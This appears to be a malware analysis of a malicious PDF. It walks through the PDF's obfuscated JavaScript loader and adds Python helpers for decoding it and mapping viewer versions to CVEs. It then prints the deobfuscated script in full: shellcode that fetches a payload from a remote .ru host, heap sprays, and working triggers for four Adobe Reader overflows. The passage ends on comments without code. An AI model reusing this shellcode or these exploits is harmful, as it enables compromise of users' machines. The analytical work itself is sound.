eep(0)).toString().substring(1,2)+'3u3c3919342i3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'3c3h3m2t3c301f3h343g381u1u18272l363l3c3j3n181'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l113f3p1u342i3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'3c3h3m2t3c301f3p383l3m3c3i3h41413c3919193f3p1u1u1q1'+parseInt(app.beep(0)).toString().substring(1,2)+'404019193m3p1u1u1p1'+parseInt(app.beep(0)).toString().substring(1,2)+'1717193f3p1t1u1p1f
1i1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3'+parseInt(app.beep(0)).toString().substring(1,2)+'383n3c363i3h191'+parseInt(app.beep(0)).toString().substring(1,2)+'41383f3m38113c39193f3p1u1u1o1f1i1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3j3l3c3h3n39191'+parseInt(app.beep(0)).toString().substring(1,2)+'41383f3m38113c391919193m3p1u1u1n1'+parseInt(app.beep(0)).toString().substring(1,2)+'4040193m3p1u1u1o1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1717193f3p1t1o1f1i1i1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u353r191'+parseInt(app.beep(0)).toString().substring(1,2)+'41383f3m38113c3919193f3p201u1q1f1i1'+parseInt(app.beep(0)).toString().substring(1,2)+'4040193f3p1t1u1q1f1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'4040193f3p201u1p1f1i1k1'+parseInt(app.beep(0)).toString().substring(1,2)+'4040193f3p1t1u1p1f1i1o1'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u393o3h363n3c3i3h1134191'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3o3n3c3f1f3j3l3c3h3n3719183j221i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i111r113s3s3s3s1i1i1i181d3h383q1126343n38191'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'413p343l113b1u343j3j1f3j3f3o3'+parseInt(app.beep(0)).toString().substring(1,2)+'2b3h3m1s393i3l193p343l11391u1h1s391t3b1f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1s391c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3c39193b2t39301f3h343g381u1u18272l363l3c3j3n181'+parseInt(app.beep(0)).toString().substring(1,2)+'3u3p343l113c1u3b2t39301f3p383l3m3c3i3h41413c3919193c201p1f1i1j1'+parseInt(app.beep(0)).toString().substring(1,2)+'1717193c1t1p1f1j1'+parseInt(app.beep(0)).toString().substring(1,
2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u361u3h383q11233l3l343s191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l11371u3o3h383m36343j381918163o1q1h1q1h163o1q1h1q1h181'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3p343l11381u3o3h383m36343j3819353d3m3'+parseInt(app.beep(0)).toString().substring(1,2)+'1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3q3b3c3f3819371f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1t1u1h3r1p1h1h1h1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u371c1u3741371u371f3m3o353m3n3l191h1d1h3r1p1h1h1h1e381f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+'3n3b1'+parseInt(app.beep(0)).toString().substring(1,2)+'1s393i3l19391u1h1s391t1j1q1h1h1s391c1c1'+parseInt(app.beep(0)).toString().substring(1,2)+'3u362t39301u371c384134191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s34191'+parseInt(app.beep(0)).toString().substring(1,2)+'1s3n3l3s3u3n3b3c3m1f3g38373c341f3h383q2i3f343s383l193h3o3f3f1'+parseInt(app.beep(0)).toString().substring(1,2)+'4136343n363b19381'+parseInt(app.beep(0)).toString().substring(1,2)+'3u4134191'+parseInt(app.beep(0)).toString().substring(1,2)+'4141';
 s='';
 for(i=0;i<a.length;i+=2)
 {
   var jj = 0;
   try
   {
     loadXML(
     {
     }
     );
   }
   catch(e)
   {
     jj=1
   }
   if (jj==1) s+=String.fromCharCode(parseInt(a[i]+a[i+1],31));
 }
 e=this;
 ev=/**/'eva'/**/;
 l='l';
 e=e[/*cas*/ev/*qwvq*/+l/*ebtt*/];
 e(s);

//------------------------------------------------------------
//

=============================================

HOW TO READ THIS OBFUSCATED CODE?

=============================================

// Look at the pattern of the obfuscation and you will see there is code hidden inside this code.
// The longer runs, like the one below, indicate the obfuscated shellcode part.

 a='353d3m3'+parseInt(app..
163o1l1h1p35163o1p351k1h1 ..
1m3838163o39391i1h163o351..
163o1p351m1n163o1k361o1m1..
351k1k163o35381h39163o1k1..
163o1n1n3737163o1h361p351..
35361k163o34371m1k163o1n1..
163o39393939163o381j39391..
351m1m163o1p353836163o1i1..
163o1p351h1p163o381p381p1..
1j1j1l163o1n1o1n1m163o361..
163o39391h1h163o1h361m1n1..
1n1n36163o1i371l1l163o1h1..
163o1i1l1m1n163o361h1p1m1..
1j3835163o1i1k3835163o1p1..
163o39393939163o1l381p381..
1h1j39163o1o1l1n1p163o1o1..
163o1j391k1h163o1n391n1n1..
1k1k39163o1n371o1q163o1o1..
163o1o1q1n1q163o1n1n1n351..
341n35163o1k1i1k1k163o1k1..
163o1o1h1n1n163o1n371o1l1..

// The repeating pattern below is a long filler string used to trigger the vulnerability;
// we can assume this is the exploit obfuscation part.

1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1
1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1
1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1
1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1



=================================

SOME ADJUSTMENT FOR DECODING

=================================

// In the last part you see the pathetic code below;
// just replace it with eval(s); or document.write(s);
// to dump the value held in s <--- the deobfuscated script

// e=this;
// ev=/**/'eva'/**/;
// l='l';
// e=e[/*cas*/ev/*qwvq*/+l/*ebtt*/];
// e(s);

eval(s);


// As explained in my earlier write-up at: http://malwaremustdie.blogspot.jp/2012/11/plugindetect-079-payloads-of-blackhole.html
// there is a repetition of the code: "parseInt(app.beep(0)).toString().substring(1,2)"
// like a='353d3m3'+parseInt(app.beep(0)).toString().substring(1,2) +....'blah'+parseInt(app.beep(0)).toString().substring(1,2)
// "(app.beep(0)).toString().substring(1,2)" <-- this value is very predictable, returning a single digit,
// so rewrite the logic with one fixed value and brute-force it..
// i.e.:
//parseInt(app.beep(0)).toString().substring(1,2) ⇒parseInt('0');
//                   :                               parseInt('1');
//                   :                               parseInt('2');
//                   :                               parseInt('3');
//                   :                               parseInt('4');
//                   :                               parseInt('5');
//                   :                               parseInt('6');
//                   :                               parseInt('7');
//                   :                               parseInt('8');
//                   :                               parseInt('9');
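// The two steps above, reading the pattern and brute-forcing the app.beep() placeholder, as an added Python example (not the author's script): it splits the `a=` expression into literal chunks and placeholders, decodes base-31 pairs exactly as the sample's loop does, and keeps the candidate that yields readable JavaScript; it also finds the longest repeated pair, the 1p1p... block, which decodes to a run of '8'. The embedded input is seven chunks copied from the page's own `a=` line; the candidate set is the digits 0-9 listed above plus 'a', which is what "NaN".substring(1,2) gives when parseInt() is fed an app.beep() call that returns nothing.

```python
import re
import string

# The expression the sample splices between every literal chunk of the `a=` line.
BEEP_EXPR = "parseInt(app.beep(0)).toString().substring(1,2)"
TOKEN_RE = re.compile(r"'([0-9a-z]*)'|(" + re.escape(BEEP_EXPR) + r")")

# Tokens a correct decode should contain; used to rank the candidate placeholder values.
MARKERS = ("function", "return", "var ", "length", "substring", "while", "new Array")


def split_expression(expr):
    """Break the `'...'+BEEP+'...'` concatenation into literal chunks (str) and
    placeholders (None) in order; the '+' operators are simply skipped."""
    return [None if beep else literal for literal, beep in TOKEN_RE.findall(expr)]


def decode_base31(encoded):
    """The sample's own loop: each two-character chunk is a base-31 number, mapped
    through String.fromCharCode. Raises ValueError on chunks outside 0-9/a-u."""
    if len(encoded) % 2:
        raise ValueError("odd-length payload")
    return "".join(chr(int(encoded[i:i + 2], 31)) for i in range(0, len(encoded), 2))


def readability(text):
    """-1 when any character is unprintable, otherwise how many JS markers appear."""
    if any(ch not in string.printable for ch in text):
        return -1
    return sum(text.count(m) for m in MARKERS)


def recover_placeholder(expr, candidates="0123456789a"):
    """Brute-force BEEP_EXPR's value: substitute each candidate, decode, and keep the
    one that yields the most readable script. Returns (candidate, decoded) or None."""
    parts = split_expression(expr)
    best = None
    for cand in candidates:
        try:
            decoded = decode_base31("".join(cand if p is None else p for p in parts))
        except ValueError:
            continue
        score = readability(decoded)
        if score >= 0 and (best is None or score > best[0]):
            best = (score, cand, decoded)
    return None if best is None else (best[1], best[2])


def longest_pair_run(encoded):
    """Longest run of one repeated base-31 pair, the tell-tale of a filler string
    (the page's 1p1p1p... block; '1p' is 1*31+25 = 56, the character '8')."""
    best_pair, best_len, i = None, 0, 0
    while i + 1 < len(encoded):
        pair, j = encoded[i:i + 2], i
        while encoded[j:j + 2] == pair:
            j += 2
        if (j - i) // 2 > best_len:
            best_pair, best_len = pair, (j - i) // 2
        i = j
    return best_pair, best_len


# Seven consecutive chunks copied from the page's `a=` expression (the start of the
# part that follows the corpus-truncated segment).
SAMPLE_EXPR = (
    "'3u3q3b3c3f38193l341f3f383h3'+parseInt(app.beep(0)).toString().substring(1,2)+"
    "'3n3b1b1j1t3k3s1'+parseInt(app.beep(0)).toString().substring(1,2)+"
    "'3u3l341c1u3l34413l341u3l341f3m3o353m3n3l3c3h3'"
    "+parseInt(app.beep(0)).toString().substring(1,2)+"
    "'191h1d3k3s1g1j1'+parseInt(app.beep(0)).toString().substring(1,2)+"
    "'1s3l383n3o3l3h113l3441393o3h363n3c3i3h11353r191'"
    "+parseInt(app.beep(0)).toString().substring(1,2)+"
    "'3u3p343l11373e3'+parseInt(app.beep(0)).toString().substring(1,2)+"
    "'1u3h383q11233l3l343s191'+parseInt(app.beep(0)).toString().substring(1,2)"
)

if __name__ == "__main__":
    cand, decoded = recover_placeholder(SAMPLE_EXPR)
    print("placeholder value:", repr(cand))
    print("decoded head:     ", decoded)
    # '163o' is the pair-of-pairs that opens every shellcode row above: it is '%u'.
    print("'163o' decodes to:", repr(decode_base31("163o")))
```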


==================================

DECODED SCRIPTS AS FOLLOWS

==================================

// Just run the script and the "s" value will dump the result
// Then you'll get the code below...

bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u642f%u6c65%u6d65%u6169%u6f74%u2e72%u7572%u383a%u3830%u2f30%u6f66%u7572%u2f6d%u696c%u6b6e%u2f73%u6f63%u756c%u6e6d%u702e%u7068%u633f%u6d79%u7577%u333d%u3a30%u6e3%u313a%u3a69%u6931%u333a%u2633%u6974%u706b%u7969%u666b%u323d%u3a76%u6b31%u313a%u3a6d%u3233%u333a%u3a33%u6b31%u313a%u3a6b%u3133%u313a%u3a6a%u6f31%u7a26%u6f6b%u3d75%u6831%u6826%u6579%u6f64%u3d61%u7066%u6d74%u266c%u6968%u6463%u3d6b%u6d68%u6e79%u616b%u776a%u0000';function ezvr(ra,qy){while(ra.length*2<qy){ra+=ra}ra=ra.substring(0,qy/2);return ra}function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload}var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow}this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow})}function printf(){nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape("%u0A0A%u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock}fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock}mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock}var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num)}function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload}var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw}tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw)}}aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version}}if((lv==9)||((sv==8)&&(lv<=8.12))){geticon()}else if(lv==7.1){printf()}else if(((sv==6)||(sv==7))&&(lv<7.11)){bx()}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date())}var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version}}if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(bjsg);while(d.length<=0x8000){d+=d}d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e}a();a();try{this.media.newPlayer(null)}catch(e){}a()}}

//
// let's make it beautiful like below:

bjsg = '%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u642f%u6c65%u6d65%u6169%u6f74%u2e72%u7572%u383a%u3830%u2f30%u6f66%u7572%u2f6d%u696c%u6b6e%u2f73%u6f63%u756c%u6e6d%u702e%u7068%u633f%u6d79%u7577%u333d%u3a30%u6e3%u313a%u3a69%u6931%u333a%u2633%u6974%u706b%u7969%u666b%u323d%u3a76%u6b31%u313a%u3a6d%u3233%u333a%u3a33%u6b31%u313a%u3a6b%u3133%u313a%u3a6a%u6f31%u7a26%u6f6b%u3d75%u6831%u6826%u6579%u6f64%u3d61%u7066%u6d74%u266c%u6968%u6463%u3d6b%u6d68%u6e79%u616b%u776a%u0000';
// Pads the NOP sled (ra) up to qy bytes: JS strings are UTF-16, so qy/2
// characters occupy qy bytes of heap.
function ezvr(ra, qy)
{
  while (ra.length * 2 < qy)
  {
    ra += ra
  }
  ra = ra.substring(0, qy / 2);
  return ra
}
// CVE-2007-5659: Collab.collectEmailInfo() buffer overflow. Sprays blocks of
// 0x9090 sled + shellcode (~0x400000 bytes each) up to 0x0c0c0c0c, then passes
// a 0x0c0c0c0c fill of at least 44952 characters as msg.
function bx()
{
  var dkg = new Array();
  var vw = 0x0c0c0c0c;
  var addr = 0x400000;
  var payload = unescape(bjsg);
  var sc_len = payload.length * 2;
  var qy = addr - (sc_len + 0x38);
  var yarsp = unescape("%u9090%u9090");
  yarsp = ezvr(yarsp, qy);
  var count2 = (vw - 0x400000) / addr;
  for (var count = 0; count < count2; count++)
  {
    dkg[count] = yarsp + payload
  }
  var overflow = unescape("%u0c0c%u0c0c");
  while (overflow.length < 44952)
  {
    overflow += overflow
  }
  this.collabStore = Collab.collectEmailInfo(
  {
    subj : "", msg : overflow
  }
  )
}
// CVE-2008-2992: util.printf() stack overflow. 1400 blocks of 0x0A0A0A0A
// sled + shellcode are sprayed, then "%45000f" applied to a huge number
// smashes the stack.
function printf()
{
  nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
  var payload = unescape(bjsg);
  heapblock = nop + payload;
  bigblock = unescape("%u0A0A%u0A0A");
  headersize = 20;
  spray = headersize + heapblock.length;
  while (bigblock.length < spray)
  {
    bigblock += bigblock
  }
  fillblock = bigblock.substring(0, spray);
  block = bigblock.substring(0, bigblock.length - spray);
  while (block.length + spray < 0x40000)
  {
    block = block + block + fillblock
  }
  mem = new Array();
  for (i = 0; i < 1400; i++)
  {
    mem[i] = block + heapblock
  }
  var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
  util.printf("%45000f", num)
}
// CVE-2009-0927: Collab.getIcon() stack overflow. Same 0x0c0c0c0c spray as
// bx(), then a 0x4000-character string of 0x09 bytes prefixed "N." is
// passed to getIcon().
function geticon()
{
  var arry = new Array();
  if (app.doc.Collab.getIcon)
  {
    var payload = unescape(bjsg);
    var hWq500CN = payload.length * 2;
    var qy = 0x400000 - (hWq500CN + 0x38);
    var yarsp = unescape("%u9090%u9090");
    yarsp = ezvr(yarsp, qy);
    var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
    for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y++)
    {
      arry[vqcQD96y] = yarsp + payload
    }
    var tUMhNbGw = unescape("%09");
    while (tUMhNbGw.length < 0x4000)
    {
      tUMhNbGw += tUMhNbGw
    }
    tUMhNbGw = "N." + tUMhNbGw;
    app.doc.Collab.getIcon(tUMhNbGw)
  }
}
// Version fingerprinting: sv = first digit of app.viewerVersion,
// lv = version of the EScript (JavaScript) plugin.
aPlugins = app.plugIns;
var sv = parseInt(app.viewerVersion.toString().charAt(0));
for (var i = 0; i < aPlugins.length; i++)
{
  if (aPlugins[i].name == 'EScript')
  {
    var lv = aPlugins[i].version
  }
}
if ((lv == 9) || ((sv == 8) && (lv <= 8.12)))
{
  geticon()
}
else if (lv == 7.1)
{
  printf()
}
else if (((sv == 6) || (sv == 7)) && (lv < 7.11))
{
  bx()
}
// This OR-chain is true for every version ((lv >= 9.1) || (lv <= 9.2) alone
// covers all numbers), so it catches everything that fell through above; the
// inner (i > 8.12) && (i < 8.2) check is the real gate.
else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17))
{
  // CVE-2009-4324: Doc.media.newPlayer() use-after-free. 2900 blocks of
  // 0x8000 characters (0x9090 sled + shellcode) are sprayed first.
  function a()
  {
    util.printd('p@111111111111111111111111 : yyyy111', new Date())
  }
  var h = app.plugIns;
  for (var f = 0; f < h.length; f++)
  {
    if (h[f].name == 'EScript')
    {
      var i = h[f].version
    }
  }
  if ((i > 8.12) && (i < 8.2))
  {
    c = new Array();
    var d = unescape('%u9090%u9090');
    var e = unescape(bjsg);
    while (d.length <= 0x8000)
    {
      d += d
    }
    d = d.substr(0, 0x8000 - e.length);
    for (f = 0; f < 2900; f++)
    {
      c[f] = d + e
    }
    a();
    a();
    try
    {
      this.media.newPlayer(null)
    }
    catch (e)
    {
    }
    a()
  }
}


========================================

THERE ARE 4 (FOUR) EXPLOITS CONTAINED IN THIS PDF, chosen by the version of the
EScript plugin (lv) and the first digit of the viewer version (sv):

1. lv == 9, or sv == 8 with lv <= 8.12                        ====> CVE-2009-0927 (Collab.getIcon() stack overflow)
2. lv == 7.1                                                  ====> CVE-2008-2992 (util.printf() stack overflow)
3. sv == 6 or sv == 7, with lv < 7.11                         ====> CVE-2007-5659 (Collab.collectEmailInfo() overflow)
4. (lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17) ====> CVE-2009-4324 (Doc.media.newPlayer() use-after-free)

Note on 4: the four clauses are OR-ed, so the condition is true for any version
((lv >= 9.1) || (lv <= 9.2) alone covers every number) and the branch simply
catches whatever fell through 1-3. The real gate is the inner check
(i > 8.12) && (i < 8.2): only an EScript version strictly between 8.12 and 8.2
reaches media.newPlayer(). Everything else, including a 9.1/9.2 viewer that
failed the lv == 9 test, exits without triggering anything.

========================================
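The dispatch logic above, re-expressed as a Python function so that any viewer/plugin version pair can be mapped to the CVE the script would attempt. This is an added example, not code from the PDF or from the MalwareMustDie write-up. It models the EScript plugin version as a float, which is what JavaScript's numeric comparison of the version string amounts to, and it keeps the fourth OR-chain exactly as written so the always-true behaviour can be checked:

```python
"""Mirror of the infector1.pdf version dispatcher: (sv, lv) -> CVE."""

CVE_GETICON = "CVE-2009-0927"    # Collab.getIcon()
CVE_PRINTF = "CVE-2008-2992"     # util.printf()
CVE_COLLAB = "CVE-2007-5659"     # Collab.collectEmailInfo()
CVE_NEWPLAYER = "CVE-2009-4324"  # Doc.media.newPlayer()


def branch4_outer(lv: float) -> bool:
    """The fourth condition exactly as written in the PDF.  Because the
    clauses are OR-ed, (lv >= 9.1) || (lv <= 9.2) alone covers every real
    number, so this returns True for any version."""
    return lv >= 9.1 or lv <= 9.2 or lv >= 8.13 or lv <= 8.17


def select_exploit(sv: int, lv: float):
    """sv: first digit of app.viewerVersion; lv: EScript plugin version.
    Returns the CVE the script would trigger, or None when it falls
    through without calling any exploit function."""
    if lv == 9 or (sv == 8 and lv <= 8.12):
        return CVE_GETICON
    if lv == 7.1:
        return CVE_PRINTF
    if sv in (6, 7) and lv < 7.11:
        return CVE_COLLAB
    if branch4_outer(lv):
        # The inner gate is the only part of branch 4 that actually selects.
        if 8.12 < lv < 8.2:
            return CVE_NEWPLAYER
    return None


def coverage(versions):
    """Map a list of (sv, lv) pairs to the exploit each would receive."""
    return {(sv, lv): select_exploit(sv, lv) for sv, lv in versions}


if __name__ == "__main__":
    probe = [(7, 7.0), (7, 7.1), (8, 8.12), (8, 8.15), (9, 9.0), (9, 9.2), (9, 9.3)]
    for (sv, lv), cve in coverage(probe).items():
        print(f"viewer {sv}.x / EScript {lv:<5} -> {cve or 'no exploit fires'}")
```

Running the probe list shows the practical consequence: a Reader 9.2 box, which the comments claim is a newPlayer target, gets nothing from this file, while 8.13 through 8.1x hits CVE-2009-4324 and 8.12 and below hits getIcon().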


// The exploit code for CVE-2009-0927 is below;
// it is applied when the Adobe version matches
// lv == 9 || ((sv == 8) && (lv <= 8.12))
// Vuln Name: Adobe Reader/Acrobat Collab.getIcon() stack buffer overflow
// (the spray of 0x9090 sleds + shellcode up to 0x0c0c0c0c comes first, then a
// 0x4000-character string of 0x09 bytes prefixed "N." is passed to getIcon())

function geticon()
{
  var arry = new Array();
  if (app.doc.Collab.getIcon)
  {
    var payload = unescape(bjsg);
    var hWq500CN = payload.length * 2;
    var qy = 0x400000 - (hWq500CN + 0x38);
    var yarsp = unescape("%u9090%u9090");
    yarsp = ezvr(yarsp, qy);
    var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
    for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y++)
    {
      arry[vqcQD96y] = yarsp + payload
    }
    var tUMhNbGw = unescape("%09");
    while (tUMhNbGw.length < 0x4000)
    {
      tUMhNbGw += tUMhNbGw
    }
    tUMhNbGw = "N." + tUMhNbGw;
    app.doc.Collab.getIcon(tUMhNbGw)
  }
}

// There is also the exploit code for CVE-2008-2992,
// applied for the Adobe version:
// (lv == 7.1)
// Vuln Name: Adobe Reader/Acrobat util.printf() stack buffer overflow.
// The trigger is the oversized "%45000f" format applied to a huge number;
// the 0x0A0A0A0A pattern ("%u0A0A%u0A0A") is the heap-spray filler, so that
// the smashed return address 0x0A0A0A0A lands in a sled in front of the shellcode.

function printf()
{
  nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
  var payload = unescape(bjsg);
  heapblock = nop + payload;
  bigblock = unescape("%u0A0A%u0A0A");
  headersize = 20;
  spray = headersize + heapblock.length;
  while (bigblock.length < spray)
  {
    bigblock += bigblock
  }
  fillblock = bigblock.substring(0, spray);
  block = bigblock.substring(0, bigblock.length - spray);
  while (block.length + spray < 0x40000)
  {
    block = block + block + fillblock
  }
  mem = new Array();
  for (i = 0; i < 1400; i++)
  {
    mem[i] = block + heapblock
  }
  var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
  util.printf("%45000f", num)
}


// As for the Adobe version below:
// (((sv == 6) || (sv == 7)) && (lv < 7.11))
// To be applied: Exploit CVE-2007-5659
// Vuln Name: Adobe Acrobat Collab.collectEmailInfo() buffer overflow
// (the msg argument is a 0x0c0c0c0c fill of at least 44952 characters, and the
// heap has been sprayed so that 0x0c0c0c0c points into a 0x9090 sled)

function bx()
{
  var dkg = new Array();
  var vw = 0x0c0c0c0c;
  var addr = 0x400000;
  var payload = unescape(bjsg);
  var sc_len = payload.length * 2;
  var qy = addr - (sc_len + 0x38);
  var yarsp = unescape("%u9090%u9090");
  yarsp = ezvr(yarsp, qy);
  var count2 = (vw - 0x400000) / addr;
  for (var count = 0; count < count2; count++)
  {
    dkg[count] = yarsp + payload
  }
  var overflow = unescape("%u0c0c%u0c0c");
  while (overflow.length < 44952)
  {
    overflow += overflow
  }
  this.collabStore = Collab.collectEmailInfo(
  {
    subj : "", msg : overflow
  }
  )
}


// As for the Adobe version below:
// ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17))
// This OR-chain is true for every version, so the branch takes whatever fell
// through the three checks above; the inner (i > 8.12) && (i < 8.2) check is
// what actually selects this path.
// To be applied: Exploit CVE-2009-4324
// Vuln Name: Doc.media.newPlayer() use-after-free in Adobe Reader/Acrobat v8.0 through 9.2
// (2900 blocks of 0x8000 characters of 0x9090 sled + shellcode are sprayed,
// then newPlayer(null) is called between util.printd() calls)

